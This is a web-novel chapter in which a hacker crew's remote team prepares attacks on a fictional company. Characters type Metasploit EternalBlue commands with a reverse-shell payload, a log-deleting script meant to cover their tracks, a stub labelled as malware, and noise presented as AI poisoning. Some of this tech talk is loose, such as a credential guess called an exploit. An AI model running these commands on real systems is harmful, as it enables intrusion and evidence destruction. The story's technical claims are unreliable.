Chereads / The Devil in The Code / Chapter 38 - Day 1: Digital Preparations

Chapter 38 - Day 1: Digital Preparations

As the on-field team gathered their gear and made their way around Marikina, the remote team stayed at the ZeroCrypt headquarters, which doubled as a tech hub hidden beneath an internet café in Concepcion Uno. The basement was filled with the quiet hum of servers, the tapping of keyboards, and the faint glow of monitors.

The remote members:

Zark

Roy

Rene

Dominic

Ricardo

Dezer

Angelica

Hiro

Glaiza

Mike

Julia

Ericson

Jobert

Lawrence

Danilo

Jojo

Had already been assigned their tasks for Day 1. Each had a specific role to ensure the digital aspects of the mission were covered, with every detail scrutinized to perfection.

"Alright, everyone," Zark said as he glanced around at the other remote operatives.

"We have our tasks. Let's make sure everything is in place by the time the on-field team arrives in California. Our job is to prepare the digital front—no mistakes."

Zark Morales (Exploit Developer)

Zark dove into ZionTech's security software, scanning for potential vulnerabilities. His eyes moved rapidly across lines of code, as he used Burp Suite to identify weaknesses in the web application firewalls.

He typed out a Python script:

Python Code

import requests

url = "https://ziontech-target.com/login"

payload = {"username": "admin", "password": "password123"}

response = requests.post(url, data=payload)

if "Login Successful" in response.text:

print("[+] Exploit found! We can gain access.")

else:

print("[-] Exploit not working, need another vector.")

The script ran, and the response indicated a potential exploit. Zark smirked, noting down the details.

"Found a few outdated patches," he muttered to himself.

"Perfect for an exploit entry point."

He called over to Dezer, who was busy using Wireshark to analyze encrypted network traffic.

"Dezer, I've got some initial findings here. We'll need to encrypt any payloads we send to avoid detection."

Dezer, using a combination of GPG and OpenSSL to manage encryption keys, didn't look up from his screen.

"Send it my way when you're ready. I'll make sure the encryption matches ZionTech's standards—it'll look just like their own network traffic."

Roy Riviera (Penetration Tester)

Roy was setting up a test environment using VirtualBox to simulate ZionTech's network defenses. He configured virtual machines with pfSense for firewall simulations and loaded Snort as an intrusion detection system.

He opened a terminal and began scripting an automated penetration test using Metasploit:

Bash Code

use exploit/windows/smb/ms17_010_eternalblue

set RHOSTS 192.168.1.100

set PAYLOAD windows/x64/meterpreter/reverse_tcp

set LHOST 192.168.1.10

exploit

The exploit ran, triggering a series of alerts on the simulated system. Roy grinned.

"As expected. They've automated AI responses for most common threats. We'll need to be creative to avoid setting off alarms."

Dominic glanced over from his workstation where he was scripting network obfuscation tools.

"Add some randomized variables to the penetration attempts. Their system likely uses behavioral patterns to detect intrusions. Let's give it something unfamiliar."

Rene Belgica (Malware Developer)

Across the room, Rene was writing malware in C++, designed to exfiltrate data and mask its presence on the host system. He used a Crypter to make the malware undetectable to most antivirus programs.

He typed out a snippet of code:

CPP Code

#include

void StealthMode() {

ShowWindow(FindWindowA("ConsoleWindowClass", NULL), 0);

}

int main() {

StealthMode();

// Code to exfiltrate data

return 0;

}

He compiled the program, running it in a sandbox to observe its behavior.

"The malware's ready for testing," he called out.

"I've built in features to mimic legitimate processes running on their network, so it should blend in with normal activity."

Angelica, who was compiling intelligence on ZionTech's activities, glanced up from her screen.

"Make sure it also has a failsafe to delete itself if detected. The last thing we need is a traceable signature leading back to us."

Rene smirked. "Already done. If it senses a high threat level, it'll self-destruct."

Ricardo Del Rosario (Network Specialist)

Ricardo configured secure communication channels using OpenVPN to ensure all data exchanged was encrypted and routed through multiple servers to mask their origin. He wrote a script to set up a backup channel:

Bash Code

#!/bin/bash

openvpn --config /etc/openvpn/securechannel.conf &

sleep 2

echo "Backup VPN channel established."

"I've set up two main channels—primary and backup," he said, adjusting the settings on his monitor.

"Both are encrypted with multi-layered security. If anything feels off, we switch to the backup immediately."

Hiro, using Nmap to scan for open ports on their own network, nodded.

"Good call, Cardo. I'll run a few scans on our own systems to make sure we're not leaving any digital footprints."

Glaiza Bakido (AI/ML Data Poisoning Expert) and Mike Bunagan (AI/ML Security Specialist)

The two worked in tandem, using TensorFlow to generate adversarial examples that would confuse ZionTech's AI-based security systems. Glaiza modified datasets to simulate non-malicious behavior while introducing subtle noise:

Python Code

import tensorflow as tf

def generate_adversarial(input_data, epsilon=0.01):

noise = epsilon * tf.sign(tf.random.normal(input_data.shape))

return input_data + noise

adversarial_data = generate_adversarial(normal_data)

"Their AI is designed to detect intrusions by analyzing patterns," Mike explained.

"We need to introduce noise into the datasets so the patterns don't look like attacks."

Glaiza grinned. "These poisoned datasets will make legitimate access look like threats and vice versa. Should be enough to cause some chaos on their end."

Angelica Valencia (Researcher/Analyst)

Angelica used Maltego to map out the relationships within ZionTech, connecting data points from public records and internal documents. She highlighted key figures in the organization:

"I'm connecting the dots here," she said, adding some notes to a shared document.

"There's been an uptick in activity from one of their R&D departments. Could be a clue about some new tech they're working on—maybe even something we could use to our advantage."

Julia wandered over, taking a look at the screen.

"If we can create a diversion, I could hit one of their servers with a botnet attack. That could give us an opening to gather more intel."

Ericson Valerio (Forensics Specialist)

At the far end of the room, Ericson was using Autopsy to simulate forensic analysis tools and scripts for cleaning up digital evidence.

"We'll need these scripts running in real-time during the operation," he said, his fingers typing out a batch script:

Batch Code

@echo off

del /s /q C:\path\to\logs\*.log

echo "Logs cleared."

He looked over at Zark. "Any files we touch or logs we generate, they'll need to be erased almost instantly."

Zark nodded, still immersed in his work.

"Set up a script to execute on command if we need to wipe the logs remotely. That way, if things go sideways, we can cover our tracks quickly."

Wrapping Up Day 1's Work

As the hours ticked by, the remote team continued fine-tuning their preparations. They worked in focused silence, occasionally breaking into quick discussions to troubleshoot problems or share findings.

Zark glanced at the digital clock mounted on the wall.

"Alright, everyone," he called out.

"Wrap up your current tasks. We're reconvening in thirty minutes to share progress updates."

The remote team members nodded in acknowledgment, finalizing their work for Day 1. The foundation was being laid for the operation against ZionTech, with each step bringing them closer to the mission's success.